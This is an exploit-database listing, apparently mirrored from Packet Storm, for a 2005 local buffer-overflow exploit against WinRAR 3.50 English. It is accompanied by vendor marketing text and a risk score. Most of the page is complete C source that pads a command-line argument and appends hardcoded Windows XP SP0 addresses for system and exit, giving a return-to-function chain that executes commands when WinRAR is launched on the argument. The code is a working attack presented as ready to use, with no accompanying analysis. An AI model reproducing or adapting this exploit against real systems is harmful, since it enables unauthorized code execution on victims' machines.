Lucene search

winrar-3.50-eng.txt

🗓️ 18 Oct 2005 00:00:00Reported by edward11Type

packetstorm🔗 packetstormsecurity.com👁 25 Views

Local exploit for WinRAR versions up to 3.50 using ret-2-func technique.

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`/*  
  
local exploit for winrar <= 3.50 ENG version  
  
  
bug is 0day :)  
  
i'm used ret-2-func technique.  
  
*/  
  
#include <stdio.h>  
#include <string.h>  
#include <windows.h>  
  
int main ( int argc, char *argv[] )  
{  
long sys_addr = 0x77C18044; // winxp sp0 targets...  
long exit_addr = 0x77C27ADC;  
long cmd_addr = 0x77C01335;  
  
char buf[3000];  
char cmd[3000];  
  
if ( argc < 2 )  
{  
printf("\n * 0xLeTzDanCe - WinRAR <= 3.50 local exploit ENG version *\n * * usage: 0xletzdance.exe <path_to_RAR>\n\n");  
exit(0);  
}  
  
memset(buf, 0x00, 3000);  
memset(cmd, 0x00, 3000);  
  
memset(buf, 0x55, 516);  
  
*(long*)&buf[strlen(buf)] = sys_addr;  
*(long *)&buf[strlen(buf)] = exit_addr;  
*(long *)&buf[strlen(buf)] = cmd_addr;  
  
sprintf(cmd, "%s %s", argv[1], buf);  
system(cmd);  
  
}  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

18 Oct 2005 00:00Current

7.4High risk

Vulners AI Score7.4